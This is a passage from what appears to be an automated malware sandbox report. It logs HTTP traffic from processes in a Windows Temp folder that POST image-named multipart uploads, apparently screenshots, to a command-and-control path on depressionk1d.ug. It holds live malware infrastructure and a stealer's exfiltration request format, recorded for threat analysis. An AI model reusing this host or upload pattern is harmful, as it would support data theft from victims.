                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:11.883905888 CET26376OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:11.883922100 CET26380OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN,p6ftUrZ$NQKjDN$<Jj4VqE9j4EQa[Yj3t.A$R"j)ajXINZ~O,P
                                                                                                                                                                                Nov 11, 2021 12:27:11.883934021 CET26385OUTData Raw: 9b 7e 2a c0 cf a1 a7 8a da e8 e7 e7 68 a2 60 c5 30 c5 ed 5a 5b 01 ed 49 e4 83 45 d0 d5 63 30 c7 4d d9 5a 66 de 98 6d fd a9 16 ab 23 3b 69 1d a9 31 57 9a df da a2 68 48 ed 4e c5 a9 a6 40 05 3b 14 ed 98 a5 0b 45 87 cc 33 14 62 a5 d9 c5 21 5c 50 2b
                                                                                                                                                                                Data Ascii: ~*h`0Z[IEc0MZfm#;i1WhHN@;E3b!\P+<!v(.)iEqE-2CS@ )?jAn!`hPN =xW4<CnJ>E_UULDOBfbUXv?_:}EJ.EsR*P>V
                                                                                                                                                                                Nov 11, 2021 12:27:11.909339905 CET26391OUTData Raw: af 51 26 dd 91 81 a1 45 65 c9 ac a7 f6 c4 36 10 22 4a be 41 b9 b8 9b cc c2 c1 1f 44 3d 39 2c 73 81 91 c2 b1 ed 53 5a 6b 7a 4e a1 0c d3 59 6a 76 57 31 40 33 2b c3 70 ae b1 8e bf 31 07 8e 87 af a5 37 09 25 7b 0b 99 5e c5 ea 2a 23 73 00 68 54 cf 1e
                                                                                                                                                                                Data Ascii: Q&Ee6"JAD=9,sSZkzNYjvW1@3+p17%{^*#shT2qx^X<';+kT1p1h<*]Y5i598,3$D&]Y{T8S$AI<Yg]Oqny2J
                                                                                                                                                                                Nov 11, 2021 12:27:11.909375906 CET26399OUTData Raw: f0 95 cd d6 8b 0e 88 35 28 1b 4d 8e dd 21 22 e6 cf cd 98 15 c8 de 8f bc 05 6c 63 04 a9 c1 19 ad 9d 5b 4b 4d 5b 42 ba d2 de 67 45 9e 13 17 9b d5 86 47 0d ef eb 49 ba 69 c5 ae fa ef fd 7c 86 b9 9e e6 03 dd 6a eb e2 d8 0a 69 b6 d2 5f 3e 98 77 a7 da
                                                                                                                                                                                Data Ascii: 5(M!"lc[KM[BgEGIi|ji_>w7r=5%kxr}5Y.Us1&DVY?B9sywa5?>b8>Jm>A{cw\w~8OY^$qR,N*0#=#`+7-6W
                                                                                                                                                                                Nov 11, 2021 12:27:11.964490891 CET26455INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:11 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                39192.168.2.549854178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:16.618755102 CET26464OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----0d00ed71927c3969bd11669ccebfe01a
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 105763
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:16.619676113 CET26465OUTData Raw: 2d 2d 2d 2d 2d 2d 30 64 30 30 65 64 37 31 39 32 37 63 33 39 36 39 62 64 31 31 36 36 39 63 63 65 62 66 65 30 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------0d00ed71927c3969bd11669ccebfe01aContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:16.619884014 CET26475OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:16.620016098 CET26477OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:16.645102978 CET26480OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:16.645277977 CET26483OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:27:16.645313025 CET26488OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:16.645339012 CET26491OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:16.645647049 CET26494OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:27:16.645695925 CET26498OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN,p6ftUrZ$NQKjDN$<Jj4VqE9j4EQa[Yj3t.A$R"j)ajXINZ~O,P
                                                                                                                                                                                Nov 11, 2021 12:27:16.645721912 CET26500OUTData Raw: 9b 7e 2a c0 cf a1 a7 8a da e8 e7 e7 68 a2 60 c5 30 c5 ed 5a 5b 01 ed 49 e4 83 45 d0 d5 63 30 c7 4d d9 5a 66 de 98 6d fd a9 16 ab 23 3b 69 1d a9 31 57 9a df da a2 68 48 ed 4e c5 a9 a6 40 05 3b 14 ed 98 a5 0b 45 87 cc 33 14 62 a5 d9 c5 21 5c 50 2b
                                                                                                                                                                                Data Ascii: ~*h`0Z[IEc0MZfm#;i1WhHN@;E3b!\P+<!v(.)iEqE-2CS@ )?jAn!`hPN =xW4<CnJ>E_UULDOBfbUXv?_:}EJ.EsR*P>V
                                                                                                                                                                                Nov 11, 2021 12:27:16.724221945 CET26574INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:16 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                4192.168.2.54978388.99.66.31443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                40192.168.2.549856178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:18.719278097 CET26575OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ea83b8c6f62f96a069126ac2ff5dff50
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 105310
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:18.719419003 CET26575OUTData Raw: 2d 2d 2d 2d 2d 2d 65 61 38 33 62 38 63 36 66 36 32 66 39 36 61 30 36 39 31 32 36 61 63 32 66 66 35 64 66 66 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------ea83b8c6f62f96a069126ac2ff5dff50Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:18.719609022 CET26585OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:18.719724894 CET26588OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:18.744803905 CET26591OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:18.744894981 CET26594OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:27:18.744924068 CET26596OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:18.747142076 CET26604OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:27:18.747194052 CET26614OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:18.770167112 CET26619OUTData Raw: 7b e3 9d 3d f4 ad 62 5d 26 ea d6 7b cd 3d b6 98 da 45 6d fc ae 58 05 6c 95 f9 b1 9e 39 06 ba 74 ba b7 91 65 64 9e 26 58 58 a4 a5 5c 1d 8c 39 20 fa 11 ef 4e 54 e5 15 76 bf af e9 89 49 37 64 4b 45 65 6b 3a a9 b2 f0 fc ba 9d 93 43 30 0a 8d 1b 67 72
                                                                                                                                                                                Data Ascii: {=b]&{=EmXl9ted&XX\9 NTvI7dKEek:C0gr0br#jugZ,3+?xCvVu4[W83<w(<A>rK"(d4bDH9'<RqkFgiCeZxzQyivjT1T'zg9]`.QU&t
                                                                                                                                                                                Nov 11, 2021 12:27:18.770205975 CET26627OUTData Raw: fd ec d0 5f f9 57 7f da 4d a8 5b ca 61 dc b1 b1 5d 85 19 73 f3 29 5d c0 e0 a9 e7 b6 2a 93 a2 9b 4b f5 ee ad 7f d6 df 22 5a 9b 5f d7 67 ff 00 00 c7 5d 75 b4 5d 6f c4 7a 96 af 6c 90 3c 56 f6 68 63 8a 70 e8 c5 8c 81 70 ec 17 8c 91 92 c0 63 9e dc 9b
                                                                                                                                                                                Data Ascii: _WM[a]s)]*K"Z_g]u]ozl<Vhcppc+i-?PAVr_]5dX1n7 4]OT5?R-E?RAnT^]/ de&q7uU7y4e'N<
                                                                                                                                                                                Nov 11, 2021 12:27:18.822871923 CET26684INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:18 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                41192.168.2.549859178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:24.444152117 CET26698OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ea83b8c6f62f96a069126ac2ff5dff50
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 105310
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:24.444287062 CET26698OUTData Raw: 2d 2d 2d 2d 2d 2d 65 61 38 33 62 38 63 36 66 36 32 66 39 36 61 30 36 39 31 32 36 61 63 32 66 66 35 64 66 66 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------ea83b8c6f62f96a069126ac2ff5dff50Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:24.444544077 CET26708OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:24.444766045 CET26711OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:24.469568014 CET26712INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:24 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 1230
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                ETag: "5a4b7cd2-4ce"
                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                                                                                                                                                                                Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
